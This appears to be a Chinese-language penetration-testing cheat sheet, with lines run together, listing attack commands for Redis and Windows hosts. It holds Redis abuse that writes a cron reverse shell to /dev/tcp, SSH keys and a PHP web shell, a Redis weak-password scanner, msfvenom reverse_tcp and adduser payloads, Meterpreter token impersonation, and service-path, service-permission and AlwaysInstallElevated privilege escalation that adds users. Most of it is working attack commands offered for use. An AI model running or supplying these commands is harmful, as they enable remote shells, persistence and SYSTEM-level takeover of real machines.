<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("calc.exe");</SCRIPT>

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\exp.hta

/var/spool/cron/用户名/var/spool/cron/crontabs/用户名/etc/crontab/etc/cron.d/xxx

redis-cli -h 192.168.2.6set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n"config set dir /var/spool/cron/config set dbfilename rootsave

ssh-keygen -t rsa  //注意结果没有换行(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txtcat key.txt | redis-cli -h 192.168.1.8 -x set xxx
is_rsa.pub192.168.63.130:6379> config set dir /root/.ssh/OK192.168.63.130:6379> config set dbfilename authorized_keysOK192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"OK192.168.63.130:6379> saveOK
ssh -i id_rsa [email protected]

config set dir /var/www/html/config set dbfilename shell.phpset x "$_POST['caidao']);?>"save

#! /usr/bin/env python# _*_  coding:utf-8 _*_import socketimport sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):    try:        socket.setdefaulttimeout(timeout)        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        s.connect((ip, int(port)))        s.send("INFO\r\n")        result = s.recv(1024)
        if "redis_version" in result:            return u"未授权访问"        elif "Authentication" in result:            for pass_ in PASSWORD_DIC:                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)                s.connect((ip, int(port)))                s.send("AUTH %s\r\n" %(pass_))                result = s.recv(1024)                if '+OK' in result:                    return u"存在弱口令，密码：%s" % (pass_)    except Exception, e:        pass
if __name__ == '__main__':    ip=sys.argv[1]    port=sys.argv[2]    print check(ip,port, timeout=10)

eval "tonumber('/bin/bash -i >& /dev/tcp/192.168.91.1/2333 0>&1', 8)" 0

use incognitolist_token -uimpersonate_token 'xxx\Administrator'

upload /root/potato.exe C:\Users\Publiccd C:\\Users\\Publicuse incognitolist_tokens -uexecute -cH -f ./potato.exelist_tokens -uimpersonate_token "NT AUTHORITY\SYSTEM"

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=1111 -f dll > /opt/xxx.dll

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

如果检测到的结果是C:\Program Files (x86)\Cisco\Cisco HostScan\bin\ciscod.exe我们可以创建一个C:\Program.exeC:\Program Files (x86)\Cisco\Cisco.exe当然需要判断路径是否可写icacls C:\Program Files (x86)\Cisco(M)代表修改权限，(F)代表完全控制，(CI)代表从属容器将继承访问控制项，(OI)代表从属文件将继承访问控制项。
重启sc stop "服务名"sc start "服务名"
假如我们的exe会弹回一个SYSTEM权限的meterpreter shell，但是我们新得到的会话很快就中断了。这是因为当一个服务在Windows系统中启动后，它必须和服务控制管理器通信。如果没有通信，服务控制管理器会认为出现了错误，并会终止这个进程。我们所有需要做的就是在终止载荷进程之前，将它迁移到其它进程，也可以使用自动迁移：set AutoRunScript migrate -f

找到对应服务给这个服务设置新的路径重启这个服务

accesschk.exe -uwcqv "administrators" *
利用1，利用MSF后门马sc config "NewServiceName" binpath="C:\test.exe"sc start "NewServiceName"

利用2，直接执行命令修改服务配置执行命令。BINARY_PATH_NAME参数指向了该服务的可执行程序(PFNET)路径。如果我们将这个值修改成任何命令，那意味着这个命令在该服务下一次启动时，将会以SYSTEM权限运行。sc config PFNET binpath= "net user test P@ssword123! /add"sc stop PFNETsc start PFNETsc config PFNET binpath= "net localgroup test P@ssword123! /add"sc stop PFNETsc start PFNET
当尝试启动服务时，它会返回一个错误。这一点我们之前已经讨论过了，在Windows系统中，当一个服务在Windows系统中启动后，它必须和服务控制管理器通信。如果没有通信，服务控制管理器会认为出现了错误，并会终止这个进程。上面的“net user”肯定是无法和服务管理器通信的，但是不用担心，我们的命令已经以SYSTEM权限运行了，并且成功添加了一个用户。

[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedorreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

C:\Users\hp\Desktop>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedERROR: The system was unable to find the specified registry key or value.

msfvenom -p windows/adduser USER=test000 PASSWORD=password123! -f msi -o rotten.msimsiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi